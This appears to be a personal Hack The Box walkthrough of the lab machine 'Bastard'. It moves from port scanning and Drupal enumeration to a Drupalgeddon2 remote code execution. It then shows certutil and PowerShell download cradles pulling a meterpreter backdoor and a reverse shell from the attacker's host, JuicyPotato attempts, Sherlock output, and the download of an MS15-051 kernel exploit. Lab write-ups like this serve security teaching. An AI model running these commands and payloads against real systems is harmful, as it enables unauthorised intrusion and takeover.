This post is about the Walkthrough of the hackthebox machine: Bastard
Hackthebox Bastard Walkthrough Link to heading
Port Scan Link to heading
Nmap Link to heading
nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.9
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-19 19:01 EST
Nmap scan report for 10.10.10.9
Host is up (0.057s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 16.46 seconds
┌──(rocky㉿kali)-[~/hckbox/Bastard]
└─$ sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.9
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-19 19:01 EST
Nmap scan report for 10.10.10.9
Host is up.
All 65535 scanned ports on 10.10.10.9 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 14.87 seconds
sudo nmap -p 80,135,49154 -Pn -sC -sV -oN detailed.txt 10.10.10.9
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-19 19:23 EST
Nmap scan report for 10.10.10.9
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.04 seconds
$ sudo nmap -p80 -script VULN 10.10.10.9 130 ⨯
[sudo] password for rocky:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-19 19:32 EST
Stats: 0:10:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.12% done; ETC: 19:43 (0:00:06 remaining)
Nmap scan report for 10.10.10.9
Host is up (0.053s latency).
PORT STATE SERVICE
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.9
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.9:80/
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.9:80/user/password
| Form id: user-pass
| Form action: /user/password
|
| Path: http://10.10.10.9:80/user/register
| Form id: user-register-form
| Form action: /user/register
|
| Path: http://10.10.10.9:80/node?destination=node
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.9:80/user
| Form id: user-login
| Form action: /user
|
| Path: http://10.10.10.9:80/user/
| Form id: user-login
|_ Form action: /user/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Nmap done: 1 IP address (1 host up) scanned in 1020.11 seconds
Directory Enumeration Link to heading
gobuster dir -u http://10.10.10.9 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.9
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/02/19 19:42:47 Starting gobuster in directory enumeration mode
===============================================================
/.cvsignore (Status: 403) [Size: 1233]
/.bash_history (Status: 403) [Size: 1233]
/.cache (Status: 403) [Size: 1233]
/.hta (Status: 403) [Size: 1233]
/.git/HEAD (Status: 403) [Size: 1233]
/.cvs (Status: 403) [Size: 1233]
/.bashrc (Status: 403) [Size: 1233]
/.forward (Status: 403) [Size: 1233]
/.history (Status: 403) [Size: 1233]
/.listings (Status: 403) [Size: 1233]
/.mysql_history (Status: 403) [Size: 1233]
/.htaccess (Status: 403) [Size: 1233]
/.listing (Status: 403) [Size: 1233]
/.profile (Status: 403) [Size: 1233]
/.perf (Status: 403) [Size: 1233]
/.rhosts (Status: 403) [Size: 1233]
/.passwd (Status: 403) [Size: 1233]
/.htpasswd (Status: 403) [Size: 1233]
/.ssh (Status: 403) [Size: 1233]
/.sh_history (Status: 403) [Size: 1233]
/.swf (Status: 403) [Size: 1233]
/.subversion (Status: 403) [Size: 1233]
/.svn (Status: 403) [Size: 1233]
/.svn/entries (Status: 403) [Size: 1233]
/.web (Status: 403) [Size: 1233]
/0 (Status: 200) [Size: 7583]
/admin (Status: 403) [Size: 1233]
/Admin (Status: 403) [Size: 1233]
/ADMIN (Status: 403) [Size: 1233]
Progress: 600 / 4615 (13.00%) [ERROR
Trying to get the initial shell. Link to heading
We know its Drupal installation. However we dont know the exact version running. As per the data we have we know its version 7.x. There is drupal scan i found online which i used and it gave me the version number as 7.54
Lets search for any known exploit. I have used “*Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution (Metasploit) *“which is displayed below.
python3 droopescan scan drupal -u http://10.10.10.9 -t 32 1 ⨯
[+] Plugins found:
ctools http://10.10.10.9/sites/all/modules/ctools/
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/ctools/changelog.txt
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
http://10.10.10.9/sites/all/modules/ctools/API.txt
libraries http://10.10.10.9/sites/all/modules/libraries/
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/libraries/changelog.txt
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/libraries/README.txt
http://10.10.10.9/sites/all/modules/libraries/readme.txt
http://10.10.10.9/sites/all/modules/libraries/README.TXT
http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
services http://10.10.10.9/sites/all/modules/services/
http://10.10.10.9/sites/all/modules/services/README.txt
http://10.10.10.9/sites/all/modules/services/readme.txt
http://10.10.10.9/sites/all/modules/services/README.TXT
http://10.10.10.9/sites/all/modules/services/LICENSE.txt
profile http://10.10.10.9/modules/profile/
php http://10.10.10.9/modules/php/
image http://10.10.10.9/modules/image/
[+] Themes found:
seven http://10.10.10.9/themes/seven/
garland http://10.10.10.9/themes/garland/
[+] Possible version(s):
7.54
[+] Possible interesting urls found:
Default changelog file - http://10.10.10.9/CHANGELOG.txt
Default admin - http://10.10.10.9/user/login
[+] Scan finished (0:53:57.469302 elapsed)
┌──(rocky㉿kali)-[/opt/droopescan]
└─$
┌──(rocky㉿kali)-[/opt/droopescan]
└─$
┌──(rocky㉿kali)-[/opt/droopescan]
└─$
searchsploit drupal 7.5
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
-----------------------------------------------------------------------------------
┌──(rocky㉿kali)-[~/hckbox/Bastard]
└─$ cd /opt
┌──(rocky㉿kali)-[/opt]
└─$ sudo git clone https://github.com/dreadlocked/Drupalgeddon2.git
[sudo] password for rocky:
Cloning into 'Drupalgeddon2'...
remote: Enumerating objects: 257, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 257 (delta 0), reused 0 (delta 0), pack-reused 253
Receiving objects: 100% (257/257), 102.12 KiB | 497.00 KiB/s, done.
Resolving deltas: 100% (88/88), done.
┌──(rocky㉿kali)-[/opt]
└─$ cd Drupalgeddon2
┌──(rocky㉿kali)-[/opt/Drupalgeddon2]
└─$ ls
drupalgeddon2-customizable-beta.rb drupalgeddon2.rb README.md
┌──(rocky㉿kali)-[/opt/Drupalgeddon2]
└─$ sudo chmod +x drupalgeddon2.rb
┌──(rocky㉿kali)-[/opt/Drupalgeddon2]
└─$ ./drupalgeddon2.rb http://10.10.10.9
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo ISDNMAFU
[+] Result : ISDNMAFU
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.9/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/files/)
[*] Moving : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> ls
drupalgeddon2>> whoami
nt authority\iusr
drupalgeddon2>> dir
Volume in drive C has no label.
Volume Serial Number is C4CD-C60B
Directory of C:\inetpub\drupal-7.54
19/03/2017 08:04 �� <DIR> .
19/03/2017 08:04 �� <DIR> ..
19/03/2017 12:42 �� 317 .editorconfig
19/03/2017 12:42 �� 174 .gitignore
19/03/2017 12:42 �� 5.969 .htaccess
19/03/2017 12:42 �� 6.604 authorize.php
19/03/2017 12:42 �� 110.781 CHANGELOG.txt
19/03/2017 12:42 �� 1.481 COPYRIGHT.txt
19/03/2017 12:42 �� 720 cron.php
19/03/2017 12:43 �� <DIR> includes
19/03/2017 12:42 �� 529 index.php
19/03/2017 12:42 �� 1.717 INSTALL.mysql.txt
19/03/2017 12:42 �� 1.874 INSTALL.pgsql.txt
19/03/2017 12:42 �� 703 install.php
19/03/2017 12:42 �� 1.298 INSTALL.sqlite.txt
19/03/2017 12:42 �� 17.995 INSTALL.txt
19/03/2017 12:42 �� 18.092 LICENSE.txt
19/03/2017 12:42 �� 8.710 MAINTAINERS.txt
19/03/2017 12:43 �� <DIR> misc
19/03/2017 12:43 �� <DIR> modules
19/03/2017 12:43 �� <DIR> profiles
19/03/2017 12:42 �� 5.382 README.txt
19/03/2017 12:42 �� 2.189 robots.txt
19/03/2017 12:43 �� <DIR> scripts
19/03/2017 12:43 �� <DIR> sites
19/03/2017 12:43 �� <DIR> themes
19/03/2017 12:42 �� 19.986 update.php
19/03/2017 12:42 �� 10.123 UPGRADE.txt
19/03/2017 12:42 �� 2.200 web.config
19/03/2017 12:42 �� 417 xmlrpc.php
21 File(s) 217.261 bytes
9 Dir(s) 4.137.070.592 bytes free
We have initial shell now as user"nt authority\iusr” However the shell doesn not allow me to navigate between folders. It seems just a read only access to specific folder.
19/03/2017 08:04 �� <DIR> ..
19/03/2017 12:42 �� 317 .editorconfig
19/03/2017 12:42 �� 174 .gitignore
19/03/2017 12:42 �� 5.969 .htaccess
19/03/2017 12:42 �� 6.604 authorize.php
19/03/2017 12:42 �� 110.781 CHANGELOG.txt
19/03/2017 12:42 �� 1.481 COPYRIGHT.txt
19/03/2017 12:42 �� 720 cron.php
19/03/2017 12:43 �� <DIR> includes
19/03/2017 12:42 �� 529 index.php
19/03/2017 12:42 �� 1.717 INSTALL.mysql.txt
19/03/2017 12:42 �� 1.874 INSTALL.pgsql.txt
19/03/2017 12:42 �� 703 install.php
19/03/2017 12:42 �� 1.298 INSTALL.sqlite.txt
19/03/2017 12:42 �� 17.995 INSTALL.txt
19/03/2017 12:42 �� 18.092 LICENSE.txt
19/03/2017 12:42 �� 8.710 MAINTAINERS.txt
19/03/2017 12:43 �� <DIR> misc
19/03/2017 12:43 �� <DIR> modules
19/03/2017 12:43 �� <DIR> profiles
19/03/2017 12:42 �� 5.382 README.txt
19/03/2017 12:42 �� 2.189 robots.txt
19/03/2017 12:43 �� <DIR> scripts
19/03/2017 12:43 �� <DIR> sites
19/03/2017 12:43 �� <DIR> themes
19/03/2017 12:42 �� 19.986 update.php
19/03/2017 12:42 �� 10.123 UPGRADE.txt
19/03/2017 12:42 �� 2.200 web.config
19/03/2017 12:42 �� 417 xmlrpc.php
21 File(s) 217.261 bytes
9 Dir(s) 4.137.070.592 bytes free
drupalgeddon2>> cd scripts
drupalgeddon2>> dir
Volume in drive C has no label.
Volume Serial Number is C4CD-C60B
Directory of C:\inetpub\drupal-7.54
19/03/2017 08:04 �� <DIR> .
19/03/2017 08:04 �� <DIR> ..
19/03/2017 12:42 �� 317 .editorconfig
19/03/2017 12:42 �� 174 .gitignore
19/03/2017 12:42 �� 5.969 .htaccess
19/03/2017 12:42 �� 6.604 authorize.php
19/03/2017 12:42 �� 110.781 CHANGELOG.txt
19/03/2017 12:42 �� 1.481 COPYRIGHT.txt
19/03/2017 12:42 �� 720 cron.php
19/03/2017 12:43 �� <DIR> includes
19/03/2017 12:42 �� 529 index.php
19/03/2017 12:42 �� 1.717 INSTALL.mysql.txt
19/03/2017 12:42 �� 1.874 INSTALL.pgsql.txt
19/03/2017 12:42 �� 703 install.php
19/03/2017 12:42 �� 1.298 INSTALL.sqlite.txt
19/03/2017 12:42 �� 17.995 INSTALL.txt
19/03/2017 12:42 �� 18.092 LICENSE.txt
19/03/2017 12:42 �� 8.710 MAINTAINERS.txt
19/03/2017 12:43 �� <DIR> misc
19/03/2017 12:43 �� <DIR> modules
19/03/2017 12:43 �� <DIR> profiles
19/03/2017 12:42 �� 5.382 README.txt
19/03/2017 12:42 �� 2.189 robots.txt
19/03/2017 12:43 �� <DIR> scripts
19/03/2017 12:43 �� <DIR> sites
19/03/2017 12:43 �� <DIR> themes
19/03/2017 12:42 �� 19.986 update.php
19/03/2017 12:42 �� 10.123 UPGRADE.txt
19/03/2017 12:42 �� 2.200 web.config
19/03/2017 12:42 �� 417 xmlrpc.php
21 File(s) 217.261 bytes
9 Dir(s) 4.137.070.592 bytes free
drupalgeddon2>>
drupalgeddon2>> pwd
drupalgeddon2>> pwd
drupalgeddon2>> systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3582622-84461
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 19/2/2022, 4:35:21 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.528 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.539 MB
Virtual Memory: In Use: 556 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
drupalgeddon2>> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
I am trying to exploit the “SeImpersonatePrivilege” via[ Releases · ivanitlearning/Juicy-Potato-x86 · GitHub]().
drupalgeddon2>> certutil -urlcache -split -f "http://10.10.14.12:8000/Juicy.Potato.x86.exe" "Juicy.exe"
**** Online ****
000000 ...
040600
CertUtil: -URLCache command completed successfully.
drupalgeddon2>> dir
Volume in drive C has no label.
Volume Serial Number is C4CD-C60B
Directory of C:\inetpub\drupal-7.54
┌──(rocky㉿kali)-[~/hckbox/Bastard]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=5555 --arch x64 -f exe -o backdoor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backdoor.exe
drupalgeddon2>> certutil -urlcache -split -f "http://10.10.14.12:8000/backdoor.exe" "backdoor.exe"
**** Online ****
0000 ...
1c00
CertUtil: -URLCache command completed successfully.
Directory of C:\inetpub\drupal-7.54
20/02/2022 04:02 �� <DIR> .
20/02/2022 04:02 �� <DIR> ..
19/03/2017 12:42 �� 317 .editorconfig
19/03/2017 12:42 �� 174 .gitignore
19/03/2017 12:42 �� 5.969 .htaccess
19/03/2017 12:42 �� 6.604 authorize.php
20/02/2022 04:02 �� 7.168 backdoor.exe
19/03/2017 12:42 �� 110.781 CHANGELOG.txt
19/03/2017 12:42 �� 1.481 COPYRIGHT.txt
19/03/2017 12:42 �� 720 cron.php
19/03/2017 12:43 �� <DIR> includes
19/03/2017 12:42 �� 529 index.php
19/03/2017 12:42 �� 1.717 INSTALL.mysql.txt
19/03/2017 12:42 �� 1.874 INSTALL.pgsql.txt
19/03/2017 12:42 �� 703 install.php
19/03/2017 12:42 �� 1.298 INSTALL.sqlite.txt
19/03/2017 12:42 �� 17.995 INSTALL.txt
20/02/2022 03:59 �� 263.680 Juicy.exe
19/03/2017 12:42 �� 18.092 LICENSE.txt
19/03/2017 12:42 �� 8.710 MAINTAINERS.txt
19/03/2017 12:43 �� <DIR> misc
19/03/2017 12:43 �� <DIR> modules
19/03/2017 12:43 �� <DIR> profiles
19/03/2017 12:42 �� 5.382 README.txt
19/03/2017 12:42 �� 2.189 robots.txt
19/03/2017 12:43 �� <DIR> scripts
19/03/2017 12:43 �� <DIR> sites
20/02/2022 03:59 �� <DIR> temp
19/03/2017 12:43 �� <DIR> themes
19/03/2017 12:42 �� 19.986 update.php
19/03/2017 12:42 �� 10.123 UPGRADE.txt
19/03/2017 12:42 �� 2.200 web.config
19/03/2017 12:42 �� 417 xmlrpc.php
23 File(s) 488.109 bytes
10 Dir(s) 4.124.024.832 bytes free
Privileged shell Link to heading
Lets try to run juicypotatao exploit to get privileged shell. It did not work.
drupalgeddon2>> Juicy.exe -t * -p backdoor.exe -l 8003
Testing {4991D34B-80A1-4291-B697-000000000000} 8003
COM -> recv failed with error: 10038
drupalgeddon2>>
drupalgeddon2>> Juicy.exe -t * -p backdoor.exe -l 8006
Testing {4991D34B-80A1-4291-B697-000000000000} 8006
COM -> recv failed with error: 10038
drupalgeddon2>>
It may be due the drupal shell. Lets try to migrate the same user shell to a powershell. Also let’s find out the actual CLSID which we can use for this exploit.
Dropping back to direct OS commands
drupalgeddon2>> powershell iex(new-object net.webclient).downloadstring('http://10.10.14.12:8000/shell.ps1')
$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.9] 60413
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\inetpub\drupal-7.54>whoami
nt authority\iusr
PS C:\inetpub\drupal-7.54> pwd
Path
----
C:\inetpub\drupal-7.54
PS C:\inetpub\drupal-7.54> cd :\\
PS C:\inetpub\drupal-7.54> Set-Location : Cannot find path 'C:\inetpub\drupal-7.54\:\' because it does not
exist.
At line:1 char:3
+ cd <<<< :\\
+ CategoryInfo : ObjectNotFound: (C:\inetpub\drupal-7.54\:\:Strin
g) [Set-Location], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLo
cationCommand
cd c:\
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 19/3/2017 12:43 ?? inetpub
d---- 19/3/2017 1:28 ?? oracle
d---- 14/7/2009 6:20 ?? P
finding CLSID. Dowload and save these 3 files to powershell which we have.
Windows 2012 Data centre CLSIDs
Then run the bat file and select some CLSID which matches with “NT Authority/SYSTEM user”. Ful results are here.
Lets try to run the exploit once again with new CLSID
It did not work again. Lets try different method.
PS C:\temp> ./juicypotato.exe -l 8003 -p C:\temp\backdoor.exe -t* -c{BA126AD6-2166-11D1-B1D0-00805FC1270E}
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 8003
COM -> recv failed with error: 10038
PS C:\temp> cmd.exe
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\temp>
PS C:\temp> juicypotato.exe -l 8003 -p C:\temp\backdoor.exe -t* -c{BA126AD6-2166-11D1-B1D0-00805FC1270E}
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\temp>
PS C:\temp> Invoke-PowerShellTcp : The term 'juicypotato.exe' is not recognized as the name
of a cmdlet, function, script file, or operable program. Check the spelling of
the name, or if a path was included, verify that the path is correct and try a
gain.
At line:127 char:21
+ Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.14.12 -Port 4444
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep
tion
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
n,Invoke-PowerShellTcp
I am using [windows exploit suggester](GitHub - Pwnistry/Windows-Exploit-Suggester-python3: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.)
sudo git clone https://github.com/Pwnistry/Windows-Exploit-Suggester-python3.git
Cloning into 'Windows-Exploit-Suggester-python3'...
remote: Enumerating objects: 123, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 123 (delta 0), reused 1 (delta 0), pack-reused 120
Receiving objects: 100% (123/123), 188.32 KiB | 918.00 KiB/s, done.
Resolving deltas: 100% (72/72), done.
┌──(rocky㉿kali)-[/opt]
└─$ cd Windows-Exploit-Suggester-python3
┌──(rocky㉿kali)-[/opt/Windows-Exploit-Suggester-python3]
└─$ sudo ./windows-exploit-suggester.py --update
[*]
initiating winsploit version 3.4...
[+]
writing to file 2022-02-20-mssb.xlsx
[*]
done
┌──(rocky㉿kali)-[/opt/Windows-Exploit-Suggester-python3]
└─$ sudo cp ~/hckbox/Bastard/systeminfo-bastard .
┌──(rocky㉿kali)-[/opt/Windows-Exploit-Suggester-python3]
└─$ sudo ./windows-exploit-suggester.py --database 2022-02-20-mssb.xlsx --systeminfo systeminfo-bastard
[*]
I could not get any good exploits from exploit suggester as well. I have tried a new privilege escalation tool called Sherlock.
PS C:\temp> IEX(new-object Net.WebClient).DownloadString("http://10.10.14.12:8000/Sherlock.ps1");Find-AllVulns
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
6-034?
VulnStatus : Not Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
ample-Exploits/MS16-135
VulnStatus : Not Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
tml
VulnStatus : Not Vulnerable
The below exploit seems applicable
sudo wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip
--2022-02-21 20:16:02-- https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip
Resolving github.com (github.com)... 13.234.210.38
Connecting to github.com (github.com)|13.234.210.38|:443... connected.
HTTP request sent, awaiting response... 302 Found
─$ sudo unzip MS15-051-KB3045171.zip 2 ⨯
Archive: MS15-051-KB3045171.zip
creating: MS15-051-KB3045171/
inflating: MS15-051-KB3045171/ms15-051.exe
